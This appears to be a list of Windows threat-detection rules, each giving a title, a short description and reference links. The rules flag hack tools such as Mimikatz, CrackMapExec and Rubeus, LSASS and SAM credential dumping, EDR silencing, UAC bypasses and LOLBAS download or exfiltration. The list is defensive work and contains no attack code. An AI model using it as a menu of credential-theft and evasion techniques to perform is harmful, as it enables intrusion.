HackTool - CrackMapExec Execution This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced. https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local, https://www.mandiant.com/resources/telegram-malware-iranian-espionage, https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz, https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject
HackTool - CrackMapExec Execution Patterns Detects various execution patterns of the CrackMapExec pentesting framework https://github.com/byt3bl33d3r/CrackMapExec
HackTool - CrackMapExec Process Patterns Detects suspicious process patterns found in logs when CrackMapExec is used https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass
HackTool - CrackMapExec PowerShell Obfuscation The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule. https://github.com/byt3bl33d3r/CrackMapExec, https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242
HackTool - CreateMiniDump Execution Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
HackTool - DInjector PowerShell Cradle Execution Detects the use of the Dinject PowerShell cradle based on the specific flags https://web.archive.org/web/20211001064856/https://github.com/snovvcrash/DInjector
HackTool - Dumpert Process Dumper Execution Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory https://github.com/outflanknl/Dumpert, https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/
HackTool - EDRSilencer Execution Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information. https://github.com/netero1010/EDRSilencer
HackTool - Empire PowerShell Launch Parameters Detects suspicious powershell command line parameters used in Empire https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165, https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191, https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178, https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64
HackTool - Empire PowerShell UAC Bypass Detects some Empire PowerShell UAC bypass methods https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64, https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64
Hacktool Execution - Imphash Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed Internal Research
HackTool - WinRM Access Via Evil-WinRM Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm, https://github.com/Hackplayers/evil-winrm
Hacktool Execution - PE Metadata Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed https://github.com/cube0x0, https://www.virustotal.com/gui/search/metadata%253ACube0x0/files
HackTool - GMER Rootkit Detector and Remover Execution Detects the execution GMER tool based on image and hash fields. http://www.gmer.net/
HackTool - HandleKatz LSASS Dumper Execution Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same https://github.com/codewhitesec/HandleKatz
HackTool - Hashcat Password Cracker Execution Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat, https://hashcat.net/wiki/doku.php?id=hashcat
HackTool - Htran/NATBypass Execution Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass) https://github.com/HiwinCN/HTran, https://github.com/cw1997/NATBypass
HackTool - Hydra Password Bruteforce Execution Detects command line parameters used by Hydra password guessing hack tool https://github.com/vanhauser-thc/thc-hydra
HackTool - Potential Impacket Lateral Movement Activity Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py, https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py, https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py, https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py, https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html
HackTool - Impacket Tools Execution Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives) https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries
HackTool - Impersonate Execution Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/, https://github.com/sensepost/impersonate
Invoke-Obfuscation COMPRESS OBFUSCATION Detects Obfuscated Powershell via COMPRESS OBFUSCATION https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation CLIP+ Launcher Detects Obfuscated use of Clip.exe to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Obfuscated IEX Invocation Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888
Invoke-Obfuscation STDIN+ Launcher Detects Obfuscated use of stdin to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation VAR+ Launcher Detects Obfuscated use of Environment Variables to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
HackTool - Inveigh Execution Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool https://github.com/Kevin-Robertson/Inveigh, https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/
Invoke-Obfuscation Via Stdin Detects Obfuscated Powershell via Stdin in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use Clip Detects Obfuscated Powershell via use Clip.exe in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use MSHTA Detects Obfuscated Powershell via use MSHTA in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION Detects Obfuscated Powershell via VAR++ LAUNCHER https://github.com/SigmaHQ/sigma/issues/1009
HackTool - Jlaive In-Memory Assembly Execution Detects the use of Jlaive to execute assemblies in a copied PowerShell https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool, https://web.archive.org/web/20220514073704/https://github.com/ch2sh/Jlaive
HackTool - Koadic Execution Detects command line parameters used by Koadic hack tool https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/, https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js, https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/
HackTool - KrbRelay Execution Detects the use of KrbRelay, a Kerberos relaying tool https://github.com/cube0x0/KrbRelay
HackTool - KrbRelayUp Execution Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced https://github.com/Dec0ne/KrbRelayUp
HackTool - RemoteKrbRelay Execution Detects the use of RemoteKrbRelay, a Kerberos relaying tool via CommandLine flags and PE metadata. https://github.com/CICADA8-Research/RemoteKrbRelay
HackTool - LaZagne Execution Detects the execution of the LaZagne. A utility used to retrieve multiple types of passwords stored on a local computer. LaZagne has been leveraged multiple times by threat actors in order to dump credentials. https://github.com/AlessandroZ/LaZagne/tree/master, https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/, https://cloud.google.com/blog/topics/threat-intelligence/alphv-ransomware-backup/, https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/, https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/raw/800c0e06571993a54e39571cf27fd474dcc5c0bc/2017/2017.11.14.Muddying_the_Water/muddying-the-water-targeted-attacks.pdf
HackTool - LocalPotato Execution Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples https://www.localpotato.com/localpotato_html/LocalPotato.html, https://github.com/decoder-it/LocalPotato
Potential Meterpreter/CobaltStrike Activity Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
HackTool - Mimikatz Execution Detection well-known mimikatz command line arguments https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://tools.thehacker.recipes/mimikatz/modules
HackTool - PCHunter Execution Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff https://web.archive.org/web/20231210115125/http://www.xuetr.com/, https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/, https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/
HackTool - Default PowerSploit/Empire Scheduled Task Creation Detects the creation of a schtask via PowerSploit or Empire Default Configuration. https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1, https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py
HackTool - PowerTool Execution Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/, https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html, https://twitter.com/gbti_sa/status/1249653895900602375?lang=en, https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml
HackTool - Pypykatz Credentials Dumping Activity Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored https://github.com/skelsec/pypykatz, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz
HackTool - PurpleSharp Execution Detects the execution of the PurpleSharp adversary simulation tool https://github.com/mvelazc0/PurpleSharp
HackTool - Quarks PwDump Execution Detects usage of the Quarks PwDump tool via commandline arguments https://github.com/quarkslab/quarkspwdump, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east
HackTool - RedMimicry Winnti Playbook Execution Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility https://redmimicry.com/posts/redmimicry-winnti/
Potential SMB Relay Attack Tool Execution Detects different hacktools used for relay attacks on Windows for privilege escalation https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/, https://pentestlab.blog/2017/04/13/hot-potato/, https://github.com/ohpe/juicy-potato, https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes, https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire, https://www.localpotato.com/
HackTool - Rubeus Execution Detects the execution of the hacktool Rubeus via PE information of command line parameters https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus, https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html, https://github.com/GhostPack/Rubeus
HackTool - SafetyKatz Execution Detects the execution of the hacktool SafetyKatz via PE information and default Image name https://github.com/GhostPack/SafetyKatz
HackTool - SecurityXploded Execution Detects the execution of SecurityXploded Tools https://securityxploded.com/, https://web.archive.org/web/20200601000524/https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/
HackTool - PPID Spoofing SelectMyParent Tool Execution Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent https://pentestlab.blog/2020/02/24/parent-pid-spoofing/, https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks, https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing, https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files
HackTool - SharPersist Execution Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit, https://github.com/mandiant/SharPersist
HackTool - SharpEvtMute Execution Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs https://github.com/bats3c/EvtMute
HackTool - SharpLdapWhoami Execution Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller https://github.com/bugch3ck/SharpLdapWhoami
HackTool - SharpMove Tool Execution Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options. https://github.com/0xthirteen/SharpMove/, https://pentestlab.blog/tag/sharpmove/
HackTool - SharpUp PrivEsc Tool Execution Detects the use of SharpUp, a tool for local privilege escalation https://github.com/GhostPack/SharpUp
HackTool - SharpView Execution Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems https://github.com/tevora-threat/SharpView/, https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview
HackTool - SharpWSUS/WSUSpendu Execution Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS. Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations. https://labs.nettitude.com/blog/introducing-sharpwsus/, https://github.com/nettitude/SharpWSUS, https://web.archive.org/web/20210512154016/https://github.com/AlsidOfficial/WSUSpendu/blob/master/WSUSpendu.ps1
HackTool - SharpChisel Execution Detects usage of the Sharp Chisel via the commandline arguments https://github.com/shantanu561993/SharpChisel, https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/
HackTool - SharpImpersonation Execution Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/, https://github.com/S3cur3Th1sSh1t/SharpImpersonation
HackTool - SharpDPAPI Execution Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata. SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project. https://github.com/GhostPack/SharpDPAPI
HackTool - SharpLDAPmonitor Execution Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects. https://github.com/p0dalirius/LDAPmonitor
HackTool - SILENTTRINITY Stager Execution Detects SILENTTRINITY stager use via PE metadata https://github.com/byt3bl33d3r/SILENTTRINITY
HackTool - Sliver C2 Implant Activity Pattern Detects process activity patterns as seen being used by Sliver C2 framework implants https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36, https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/
HackTool - SOAPHound Execution Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information. https://github.com/FalconForceTeam/SOAPHound, https://medium.com/falconforce/soaphound-tool-to-collect-active-directory-data-via-adws-165aca78288c
HackTool - Stracciatella Execution Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics. https://github.com/mgeeky/Stracciatella
HackTool - SysmonEOP Execution Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120 https://github.com/Wh04m1001/SysmonEoP
HackTool - TruffleSnout Execution Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration. https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md, https://github.com/dsnezhkov/TruffleSnout, https://github.com/dsnezhkov/TruffleSnout/blob/master/TruffleSnout/Docs/USAGE.md
HackTool - UACMe Akagi Execution Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata https://github.com/hfiref0x/UACME
HackTool - Windows Credential Editor (WCE) Execution Detects the use of Windows Credential Editor (WCE) https://www.ampliasecurity.com/research/windows-credentials-editor/
HackTool - winPEAS Execution WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz https://github.com/carlospolop/PEASS-ng, https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
HackTool - WinPwn Execution Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation. https://github.com/S3cur3Th1sSh1t/WinPwn, https://www.publicnow.com/view/EB87DB49C654D9B63995FAD4C9DE3D3CC4F6C3ED?1671634841, https://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/, https://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md, https://grep.app/search?q=winpwn&filter[repo][0]=redcanaryco/atomic-red-team
HackTool - Wmiexec Default Powershell Command Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py
HackTool - XORDump Execution Detects suspicious use of XORDump process memory dumping utility https://github.com/audibleblink/xordump
Suspicious ZipExec Execution ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. https://twitter.com/SBousseaden/status/1451237393017839616, https://github.com/Tylous/ZipExec
Suspicious Execution of Hostname Use of hostname to get information https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/hostname
Suspicious HWP Sub Processes Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/, https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1, https://twitter.com/cyberwar_15/status/1187287262054076416, https://blog.alyac.co.kr/1901, https://en.wikipedia.org/wiki/Hangul_(word_processor)
Potential Fake Instance Of Hxtsr.EXE Executed HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications. HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files". Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe Internal Research
Use Icacls to Hide File to Everyone Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files https://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/
File Download And Execution Via IEExec.EXE Detects execution of the IEExec utility to download and execute files https://lolbas-project.github.io/lolbas/Binaries/Ieexec/
Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations. This behavior has been observed in-the-wild by different threat actors. https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html, https://en.wikipedia.org/wiki/IExpress, https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/, https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior
Disable Windows IIS HTTP Logging Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging
Microsoft IIS Service Account Password Dumped Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html, https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA, https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/
IIS Native-Code Module Command Line Installation Detects suspicious IIS native-code module installations via command line https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/, https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/
Suspicious IIS URL GlobalRules Rewrite Via AppCmd Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells. https://twitter.com/malmoeb/status/1616702107242971144, https://learn.microsoft.com/en-us/answers/questions/739120/how-to-add-re-write-global-rule-with-action-type-r
Microsoft IIS Connection Strings Decryption Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command. https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html
Suspicious IIS Module Registration Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/
C# IL Code Compilation Via Ilasm.EXE Detects the use of "Ilasm.EXE" in order to compile C# intermediate (IL) code to EXE or DLL. https://lolbas-project.github.io/lolbas/Binaries/Ilasm/, https://www.echotrail.io/insights/search/ilasm.exe
ImagingDevices Unusual Parent/Child Processes Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity https://thedfirreport.com/2022/09/26/bumblebee-round-two/
Arbitrary File Download Via IMEWDBLD.EXE Detects usage of "IMEWDBLD.exe" to download arbitrary files https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download, https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/
InfDefaultInstall.exe .inf Execution Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution, https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/
File Download Via InstallUtil.EXE Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\" https://github.com/LOLBAS-Project/LOLBAS/pull/239
Suspicious Execution of InstallUtil Without Log Uses the .NET InstallUtil.exe application in order to execute image without log https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/, https://learn.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool
Suspicious Shells Spawn by Java Utility Keytool Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation) https://redcanary.com/blog/intelligence-insights-december-2021, https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html
Suspicious Child Process Of Manage Engine ServiceDesk Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/, https://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py, https://blog.viettelcybersecurity.com/saml-show-stopper/
Java Running with Remote Debugging Detects a JAVA process running with remote debugging allowing more than just localhost to connect https://dzone.com/articles/remote-debugging-java-applications-with-jdwp
Suspicious Processes Spawned by Java.EXE Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j) https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/
Shell Process Spawned by Java.EXE Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation) https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/
Suspicious SysAidServer Child Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions) https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/
JScript Compiler Execution Detects the execution of the "jsc.exe" (JScript Compiler). Attacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting. https://lolbas-project.github.io/lolbas/Binaries/Jsc/, https://www.phpied.com/make-your-javascript-a-windows-exe/, https://twitter.com/DissectMalware/status/998797808907046913
Kavremover Dropped Binary LOLBIN Usage Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries. https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea
Windows Kernel Debugger Execution Detects execution of the Windows Kernel Debugger "kd.exe". Internal Research
Computer Password Change Via Ksetup.EXE Detects password change for the computer's domain account or host principal via "ksetup.exe" https://twitter.com/Oddvarmoe/status/1641712700605513729, https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup
Potentially Suspicious Child Process of KeyScrambler.exe Detects potentially suspicious child processes of KeyScrambler.exe https://twitter.com/DTCERT/status/1712785421845790799
Active Directory Structure Export Via Ldifde.EXE Detects the execution of "ldifde.exe" in order to export organizational Active Directory structure. https://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit, https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)
Logged-On User Password Change Via Ksetup.EXE Detects password change for the logged-on user's via "ksetup.exe" https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup
Import LDAP Data Interchange Format File Via Ldifde.EXE Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server. https://twitter.com/0gtweet/status/1564968845726580736, https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)
Uncommon Link.EXE Parent Process Detects an uncommon parent process of "LINK.EXE". Link.EXE in Microsoft incremental linker. Its a utility usually bundled with Visual Studio installation. Multiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc) have a hardcode call to the "LINK.EXE" binary without checking its validity. This would allow an attacker to sideload any binary with the name "link.exe" if one of the aforementioned tools get executed from a different location. By filtering the known locations of such utilities we can spot uncommon parent process of LINK.EXE that might be suspicious or malicious. https://twitter.com/0gtweet/status/1560732860935729152
Rebuild Performance Counter Values Via Lodctr.EXE Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions. https://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr
Suspicious Windows Trace ETW Session Tamper Via Logman.EXE Detects the execution of "logman" utility in order to disable or delete Windows trace sessions https://twitter.com/0gtweet/status/1359039665232306183?s=21, https://ss64.com/nt/logman.html
Suspicious CustomShellHost Execution Detects the execution of CustomShellHost binary where the child isn't located in 'C:\Windows\explorer.exe' https://github.com/LOLBAS-Project/LOLBAS/pull/180, https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/
LOLBAS Data Exfiltration by DataSvcUtil.exe Detects when a user performs data exfiltration by using DataSvcUtil.exe https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6, https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe, https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services, https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services, https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/
Devtoolslauncher.exe Executes Specified Binary The Devtoolslauncher.exe executes other binary https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/, https://twitter.com/_felamos/status/1179811992841797632
DeviceCredentialDeployment Execution Detects the execution of DeviceCredentialDeployment to hide a process from view https://github.com/LOLBAS-Project/LOLBAS/pull/147
